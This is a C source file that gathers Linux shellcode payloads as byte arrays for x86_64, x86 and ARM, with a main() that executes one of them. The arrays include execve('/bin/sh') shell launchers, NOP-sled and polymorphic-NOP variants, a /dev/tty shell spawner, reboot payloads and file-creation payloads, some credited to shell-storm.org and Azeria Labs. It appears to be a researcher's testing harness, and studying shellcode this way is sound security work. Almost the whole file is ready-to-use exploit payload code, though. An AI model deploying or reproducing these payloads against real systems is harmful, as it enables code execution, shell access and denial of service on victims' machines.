/*
# Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode
# Date: 2010-04-26
# Author: zbt
# Tested on: x86_64 Debian GNU/Linux
*/
/*
    ; execve("/bin/sh", ["/bin/sh"], NULL)
 
    section .text
            global _start
 
    _start:
            xor     rdx, rdx
            mov     qword rbx, '//bin/sh'
            shr     rbx, 0x8
            push    rbx
            mov     rdi, rsp
            push    rax
            push    rdi
            mov     rsi, rsp
            mov     al, 0x3b
            syscall
*/
 
int main(void)
{
	// Working in Linux x64 machine//
    char shellcode1[] =
    "\x48\x31\xd2"                                  // xor    %rdx, %rdx
    "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov	$0x68732f6e69622f2f, %rbx
    "\x48\xc1\xeb\x08"                              // shr    $0x8, %rbx
    "\x53"                                          // push   %rbx
    "\x48\x89\xe7"                                  // mov    %rsp, %rdi
    "\x50"                                          // push   %rax
    "\x57"                                          // push   %rdi
    "\x48\x89\xe6"                                  // mov    %rsp, %rsi
    "\xb0\x3b"                                      // mov    $0x3b, %al
    "\x0f\x05";                                     // syscall
    
    // working in Linux x32 machine//
    char shellcode_nonop[] = 
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/bin/sh";

	char shellcode_simplenop[] =
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/bin/sh";

	char shellcode_polynop[] =
	"\x99\x96\x97\x93\x91\x4d\x48\x47\x4f\x40\x41\x37\x3f\x97\x46\x4e\xf8"
	"\x92\xfc\x98\x27\x2f\x9f\xf9\x4a\x44\x42\x43\x49\x4b\xf5\x45\x4c"
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/bin/sh";
	
	char createfile_shellcode[] = 
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
	"\xEB\x18\x5B\x31\xC0\x88\x43\x14\xB0\x08\x31\xC9\x66\xB9\xBC\x02\xCD\x80\x31\xC0\xB0\x01\x31\xDB"
	"\xCD\x80\xE8\xE3\xFF\xFF\xFF/tmp/rip-eval/f_xxxx";
	
	char launch_shell[] = 
	"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31"
	"\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin"
	"\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
	
	// Ilegal Instruction reported //
	char reboot_shell[] =
	"\xba\xdc\xfe\x21\x43"  // mov    $0x4321fedc,%edx
    "\xbe\x69\x19\x12\x28"  // mov    $0x28121969,%esi
    "\xbf\xad\xde\xe1\xfe"  // mov    $0xfee1dead,%edi
    "\xb0\xa9"              // mov    $0xa9,%al
    "\x0f\x05";             // syscall
    
    char reboot_shell2[] =
    "\x6a\x0b"		// push	$0xb
	"\x58"			// pop	%eax
	"\x99"			// cltd
	"\x52"			// push	%edx
	"\x68\x62\x6f\x6f\x74"	// push	$0x746f6f62
	"\x68\x6e\x2f\x72\x65"	// push	$0x65722f6e
	"\x68\x2f\x73\x62\x69"	// push	$0x6962732f
	"\x89\xe3"		// mov	%esp,%ebx
	"\x52"			// push	%edx
	"\x53"			// push	%ebx
	"\x89\xe1"		// mov	%esp,%ecx
	"\xcd\x80";		// int	$0x80
	
	char exit_shell[]=
	"\xb0\x01\x31\xdb\xcd\x80";
	
    char hello_shell[]=
    "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd"
    "\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f";
    
/******* ARM shell codes ***************/
    /** Hello from hello-e.s ****/
    char hello_shell_e[]=
    "\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x06\x22\x79\x46\x0e\x31\x01\x20\x04\x27\x01\xdf"
    "\x24\x1b\x20\x1c\x01\x27\x01\xdf\x68\x65\x6c\x6c\x6f\x0a\x00\x00";
    /** Hello from hello-d.s ****/
    char hello_shell_d[]=
    "\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x0c\x22\x79\x46\x0e\x31\x01\x20\x04\x27\x01"
    "\xdf\x24\x1b\x20\x1c\x01\x27\x01\xdf\x68\x65\x6c\x6c\x6f\x0a\xc0\x46";
    /** Hello World from hello-f.s ***
     * NOT WORKING!! Illegal Instruction
     */
    char hello_shell_f[]=
    "\xe9\x2d\x50\x00\xe5\x9f\x00\x04\xeb\xff\xff\xb4\xe8\xbd\x90\x00\x00\x02\x10\x28";

    
    /** NOT working: Illegal Instruction. Hello from write.s . This contains 0x00 (null) characters not accepted by copy functions ****/
    char hello_shell_write[]=
    "\x01\x00\xa0\xe3\x10\x10\x8f\xe2\x06\x20\xa0\xe3\x04\x70\xa0\xe3\x00\x00\x00\xef"
    "\x01\x70\xa0\xe3\x00\x00\x00\xef\x48\x45\x4c\x4c\x4f\x00\x00\x00";
    
    /** Create a file using shell code from shell-storm.org : http://shell-storm.org/shellcode/files/shellcode-854.php
     * Converted to create file @ /tmp/rip-eval/f_xxxx : 
     * 2f 74 6d 70 2f 72 69 70 2d 65 76 61 6c 2f 66 5f 78 78 78 78
     * https://www.rapidtables.com/convert/number/ascii-to-hex.html
     * file @ ./f_xxx : 2e 2f 66 5f 78 78 78 78
     * file @ ./f_xxx\n : 2e 2f 66 5f 78 78 78 78 5c 6e
     */
    char create_file[]=
    "\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x78\x46\x10\x30\xff\x21\xff\x31\x01\x31"
    "\x08\x27\x01\xdf\x40\x40\x01\x27\x01\xdf"
    "\x2f\x74\x6d\x70\x2f\x72\x69\x70\x2d\x65\x76\x61\x6c\x2f\x66\x5f\x78\x78\x78\x78";    
    /** Create a file using shell code file.c:
     * File is generated @ ./data.txt
     * NOT WORKING!! 
     */
    char create_file_b[]=
    "\xe9\x2d\x48\x00\xe2\x8d\xb0\x04\xe5\x9f\x10\x10\xe5\x9f\x00\x10"
    "\xeb\xff\xff\xb8\xe3\xa0\x30\x00\xe1\xa0\x00\x03\xe8\xbd\x88\x00"
    "\x00\x00\x01\xb6\x00\x01\x04\x9c";
    /** Create a file using shell code from create-b.s:
     * File is generated @ ./f_xxxx
     * 
     */
    char create_file_b2[]=
    "\x14\x00\x9f\xe5"
    "\xb6\x11\x00\xe3"
    "\x01\x20\xa0\xe3"
    "\x08\x70\xa0\xe3"
    "\x01\xdf"
    "\x01\x07\xa0\xe3"
    "\x01\xdf"
    "\x2e\x2f\x66\x5f\x78\x78\x78\x78";   
     /** Create a file using shell code from create-d.s:
     * File is generated @ ./f_xxxx
     * 
     */
    char create_file_d[]=
    "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x49\x40\x52\x40\xff\x21"
    "\x08\x27\x01\xdf\x01\x27\x01\xdf\x66\x5f\x78\x78\x58\x78\x78\x78";
    
    /** Create a file using shell code from create-e.s:
     * File is generated @ ./f_xxxx
     */
    char create_file_e[]=
    "\x18\x00\x8f\xe2\x01\x10\x21\xe0\x02\x20\x22\xe0\xff\x10\xa0\xe3"
    "\x08\x70\xa0\xe3\x01\x00\x00\xef\x01\x70\xa0\xe3\x01\x00\x00\xef"
    "\x66\x5f\x78\x78\x58\x58\x58\x00";
    
    
    /** Launch command prompt using shell code from shell-storm.org : http://shell-storm.org/shellcode/files/shellcode-855.php
     **/    
    char launch_prompt[]=
    "\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x10\xa0\xe1\x01\x10\xa0\xe1"
    "\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x40\x40\x78\x44\x0c\x30\x49\x40\x52\x40"
    "\x0b\x27\x01\xdf\x01\x27\x01\xdf"
    "\x2f\x2f\x62\x69\x6e\x2f\x2f\x73\x68";
    /** Launch command prompt using shell code from Azerian Labs code: https://azeria-labs.com/writing-arm-shellcode/
     *	Contains NULL char 0x00
     * */    
    char launch_prompt_2[]=
    "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\x0b\x27\x01"
    "\xdf\x2d\x1c\x2f\x62\x69\x6e\x2f\x73\x68\x00";
    char launch_prompt_3[]=
    "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\x0b\x27\x01"
    "\xdf\x2d\x1c\x2f\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x00\xc0\x46";
    
    char launch_prompt_4[]=
    "\x01\x30\x8f\xe2"
    "\x13\xff\x2f\xe1"
    "\x78\x46\x0e\x30"
    "\x01\x90\x49\x1a"
    "\x92\x1a\x08\x27"
    "\xc2\x51\x03\x37"
    "\x01\xdf\x2f\x62"
    "\x69\x6e\x2f\x2f"
    "\x73\x68";
    
 
    (*(void (*)()) create_file)();
     
    return 0;
}
